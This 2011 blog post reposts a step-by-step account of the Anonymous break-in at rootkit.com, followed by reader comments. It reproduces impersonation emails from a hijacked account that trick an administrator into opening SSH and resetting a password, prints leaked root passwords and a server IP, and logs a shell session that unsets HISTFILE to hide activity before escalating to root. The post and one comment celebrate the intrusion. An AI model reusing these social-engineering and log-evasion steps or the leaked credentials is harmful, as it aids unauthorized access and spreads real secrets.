The Hack o blog

Reinventing the weel

How to get root on rootkit.com, a step-by-step of how Anonymous gained root access.

Auth ssh

Image via Wikipedia

This brief text file shows how simple it was for anonymous to get  access  to Greg Hoglands website rootkit.com:

How to get root on rootkit.com? Well, it's quite easy if you have
 access to Greg Hoglands email account, read for yourself.
--------------------------------------------------------------
From: Greg Hoglund ISun, Feb 6, 2011 at 1:59 PM
To: jussi
im in europe and need to ssh into the server. can you drop open up
firewall and allow ssh through port 59022 or something vague?
and is our root password still 88j4bb3rw0cky88 or did we change to
88Scr3am3r88 ?
thanks
From: jussi jaakonaho  ISun, Feb 6, 2011 at 2:06 PM
To: Greg Hoglund
hi, do you have public ip? or should i just drop fw?
and it is w0cky - tho no remote root access allowed
From: Greg Hoglund  ISun, Feb 6, 2011 at 2:08 PM
To: jussi jaakonaho
no i dont have the public ip with me at the moment because im ready
for a small meeting and im in a rush.
if anything just reset my password to changeme123 and give me public
ip and ill ssh in and reset my pw.
From: jussi jaakonaho  ISun, Feb 6, 2011 at 2:10 PM
To: Greg Hoglund
ok,
takes couple mins, i will mail you when ready. ssh runs on 47152
...a little later:
bash-3.2# ssh hoglund@65.74.181.141 -p 47152
[unauthorized access prohibited]
hoglund@65.74.181.141's password:
[hoglund@www hoglund]$ unset
hoglund@www hoglund]$ w
11:23:50  up 30 days,  5:45,  4 users,  load average: 0.00, 0.00, 0.00
USER     TTY    FROM             LOGIN@   IDLE   JCPU   PCPU  WHAT
jussi    pts/0  cs145060.pp.htv. Wed11pm  59.00s  0.38s  0.35s screen -r
jussi    pts/1  -                Thu 5am  1:13    0.38s  4.90s SCREEN
jussi    pts/2  -                Thu 5am  59.00s  0.68s  4.90s SCREEN
hoglund  pts/3  132.181.74.65.st 11:23am  0.00s  0.03s  0.00s  w
[hoglund@www hoglund]$ unset HIST
[hoglund@www hoglund]$ unset HISTFLE
[hoglund@www hoglund]$ unset HISTFILE
[hoglund@www hoglund]$ uname -a;hostname
Linux www.rootkit.com 2.4.21-40.ELsmp #1 SMP Wed Mar 15 14:21:45 EST
2006 i686 i686 i386 GNU/Linux

www.rootkit.com
[hoglund@www hoglund]$ su -
Password:
[root@www root]# unset HIST
[root@www root]# unset HISTFILE
[root@www root]# uname -a;hostname;id
Linux www.rootkit.com 2.4.21-40.ELsmp #1 SMP Wed Mar 15 14:21:45 EST
2006 i686 i686 i386 GNU/Linux

www.rootkit.com
uid=0(root) gid=0(root) groups=0(root),1200(varmistus)
(source)
Advertisements

3 responses to “How to get root on rootkit.com, a step-by-step of how Anonymous gained root access.

  1. Pingback: Tweets that mention How to get root on rootkit.com, a step-by-step of how Anonymous gained root access. « The Hack o blog -- Topsy.com

  2. Cyber Crime February 20, 2011 at 11:08 AM

    Wow. This is awesome. I found your blog via underground systems forum and I am glad I did. Keep writing more of this sort. Thanks!

  3. Pingback: How Anonymous r00ted rootkit.com | supersick

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: